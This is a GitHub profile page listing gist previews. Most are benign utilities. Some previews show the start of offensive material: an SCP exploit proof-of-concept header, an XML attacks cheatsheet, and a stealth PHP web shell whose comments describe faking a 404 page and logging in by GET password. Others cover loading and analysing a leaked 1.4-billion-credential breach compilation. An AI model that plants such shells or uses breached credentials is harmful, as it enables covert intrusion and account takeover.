Skip to content

Instantly share code, notes, and snippets.

View AgelxNash's full-sized avatar
Open to suggestions

Евгений Борисов AgelxNash

Open to suggestions
73 followers · 70 following
View GitHub Profile
@mehaase
mehaase / sshtranger_things.py
Last active March 5, 2024 18:43
SSHtranger Things Exploit POC
'''
Title: SSHtranger Things
Author: Mark E. Haase <mhaase@hyperiongray.com>
Homepage: https://www.hyperiongray.com
Date: 2019-01-17
CVE: CVE-2019-6111, CVE-2019-6110
Advisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt
Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1
We have nicknamed this "SSHtranger Things" because the bug is so old it could be
@631068264
631068264 / py2
Created December 6, 2018 02:24
python inet_ntoa and inet_aton
def inet_ntoa(n):
import socket, struct
if n:
try:
packed_value = struct.pack('!I', int(n))
ip = socket.inet_ntoa(packed_value)
return ip
except:
return None
return None
@douglasmiranda
douglasmiranda / instructions.md
Created July 19, 2018 05:51
Add email to Keybase.io PGP Key (Public Key)

Export your public key:

keybase pgp export > keybase-public.key

Export your private key:

keybase pgp export --secret &gt; keybase-private.key
@onedr0p
onedr0p / transmission-gc.sh
Last active October 21, 2023 19:04
Transmission Garbage Collector
#!/bin/sh
#
# INFO
#
# This works if sonarr and radarr are set up to have a Category of sonarr and radarr respectively
# If you are using other Categories to save your automated downloads, update the script where you see:
# "radarr"|"sonarr")
# This script will not touch anything outside those Categories
@spacepatcher
spacepatcher / Breach Compilation (1.4 billion credentials) in Postgres.md
Last active April 23, 2024 18:03
Breach Compilation (1.4 billion credentials) in Postgres.md

What would you need:

Hardware requirements

@Hydraze
Hydraze / gist:372e221ef52ce8ddc6b5ba2108f2251f
Created December 12, 2017 18:25
PACK run on the 1.4 billion passwords ("BreachCompilation")
_
StatsGen 0.0.3 | |
_ __ __ _ ___| | _
| '_ \ / _` |/ __| |/ /
| |_) | (_| | (__| <
| .__/ \__,_|\___|_|\_\
| |
|_| iphelix@thesprawl.org
@mgeeky
mgeeky / xml-attacks.md
Last active April 13, 2024 15:52
XML Vulnerabilities and Attacks cheatsheet

XML Vulnerabilities

XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.

The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.

@ttycelery
ttycelery / idx_v3_modified.php
Last active June 4, 2023 15:31
IndoXploit Shell v3 (Stealth Version)
<?php
/*
* # IndoXploit v3 Web Shell (Stealth Version)
* # What was involved?
* - Uses dynamic 404 page from the server to make the web shell looks like it was deleted
* - Login method is by using GET parameters, (example: 'http://example.com/idx_s.php?passwd=password_saia_kaka')
* # Important Bookmark
* - Password configuration at line 27
* - login_shell() function at line 40-52
* - Login validation at line 57-64
@Diagonactic
Diagonactic / authorizePublicKeybaseId.sh
Created July 29, 2017 18:02
Add the public key of a keybase.io user to authorized_keys without handling the user's private key or installing the keybase client
#!/bin/bash
function die() {
local message="$1" code=$2
if [[ -z "$code" ]]; then
code=1
fi
(>&2 echo -e "$message")
exit $code
@Tr3jer
Tr3jer / fofa_rule.sql
Last active April 3, 2023 14:05
fofa_rule.sql
/*
Navicat Premium Data Transfer
Source Server : localhost
Source Server Type : MySQL
Source Server Version : 50542
Source Host : localhost
Source Database : rule
Target Server Type : MySQL